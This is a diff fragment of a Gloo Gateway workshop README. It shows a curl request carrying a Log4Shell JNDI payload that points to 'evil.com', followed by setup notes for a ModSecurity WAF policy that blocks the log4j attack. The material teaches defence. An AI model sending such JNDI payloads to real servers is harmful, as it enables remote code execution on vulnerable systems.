solo-io/solo-cop/workshops/gloo-gateway/README.md

 curl -ik -X GET -H "User-Agent: \${jndi:ldap://evil.com/x}" http://$GLOO_GATEWAY/httpbin/get
 ```

-3. With the Gloo Mesh WAF policy custom resource, you can create reusable policies for ModSecurity.
+3. With the Gloo WAF policy custom resource, you can create reusable policies for ModSecurity.
 Review the `log4j` WAF policy and the frontend route table.
 Note the following settings.

 * In the route table, the frontend route has the label `route: httpbin`.
 The WAF policy applies to routes with this same label.
 * In the WAF policy config, the default core rule set is disabled.
 Instead, a custom rule set is created for the `log4j` attack.